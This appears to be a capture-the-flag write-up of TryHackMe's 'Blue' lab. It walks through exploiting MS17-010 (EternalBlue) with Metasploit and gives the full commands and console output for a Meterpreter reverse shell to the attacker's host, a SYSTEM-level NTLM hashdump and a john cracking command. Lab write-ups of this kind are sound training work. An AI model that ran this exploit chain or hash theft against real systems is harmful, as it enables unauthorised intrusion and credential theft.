Blue

Blue

Hacking For Ramen

Blue is the second machine in TryHackMe’s “Offensive pentesting” path.

Enumeration

We will start with nmap scan on the target:

nmap nmap -sV -vv --script vuln 10.10.221.153

PORT      STATE SERVICE            REASON  VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49158/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

This machine is vulnerable to the smb-vuln-ms17-010 exploit, known in media as EternalBlue.

It can be done without Metasploit, of course, but it will be time consuming.

I’ll probably describe non-metasploit method next time.

Exploitation

Run Metasploit:

msfconsole

       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params set LHOST eth0

Set up the exploit:

msf5 > use windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.62.28
RHOSTS => 10.10.62.28
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0

It should be fine as it is, but you also might need to change the LPORT too. Hit run:

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.11.19.53:1337
[*] 10.10.62.28:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.62.28:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.62.28:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.62.28:445 - Connecting to target for exploitation.
[+] 10.10.62.28:445 - Connection established for exploitation.
[+] 10.10.62.28:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.62.28:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.62.28:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.62.28:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.62.28:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.62.28:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.62.28:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.62.28:445 - Sending all but last fragment of exploit packet
[*] 10.10.62.28:445 - Starting non-paged pool grooming
[+] 10.10.62.28:445 - Sending SMBv2 buffers
[+] 10.10.62.28:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.62.28:445 - Sending final SMBv2 buffers.
[*] 10.10.62.28:445 - Sending last fragment of exploit packet!
[*] 10.10.62.28:445 - Receiving response from exploit packet
[+] 10.10.62.28:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.62.28:445 - Sending egg to corrupted connection.
[*] 10.10.62.28:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.62.28
[*] Meterpreter session 1 opened (10.11.19.53:1337 -> 10.10.62.28:49170) at 2020-10-08 10:25:32 -0400
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.62.28:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : JON-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

A process of migrating the shell is well described in the official material, but I didn’t have any issue with the shell as it is.

Post Exploitation

As the shell is already running as NT AUTHORITY\SYSTEM we don’t need to do a PrivEsc. However, you might collect some useful data from the compromised machine. Most of OSCP lab machines have something juicy to find if you become a root. Don’t skip the enumeration! To grab users hashes, we can use hashdump command:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

We have a hash now! Let’s crack it. Save the hash into the file (jon.hash in my case) and crack it with john:

/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt --format=NT ./jon.hash

Yay! We have Jon’s password now.

Capturing flags

Well, the exercise is explicitly asking you to submit flags, but don’t think of them as a CTF flags. A flag in a good CTF is located in the place where you can’t reach it without going an extra mile. There are three flags in this machine, and they are placed in quite sensitive places:

- C:/
- C:/Windows/System32/config/
- C:/Users/Jon/Documents

That’s make sense. System32/config/ is the place where SAM files located, Jon is the admin, so something helpful might be found in the Documents folder, etc.

Takeaway
  • Exploits rarely works fine out of the box. You might need a lot of patience to make it work sometimes.
  • Not all exploits (especially if we’re talking about kernel exploits) are stable. You might need to restart this box a bunch of times.
  • Metasploit doesn’t always mean that your exploitation phase will go smoothly.
  • Post exploitation phase is important.


Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org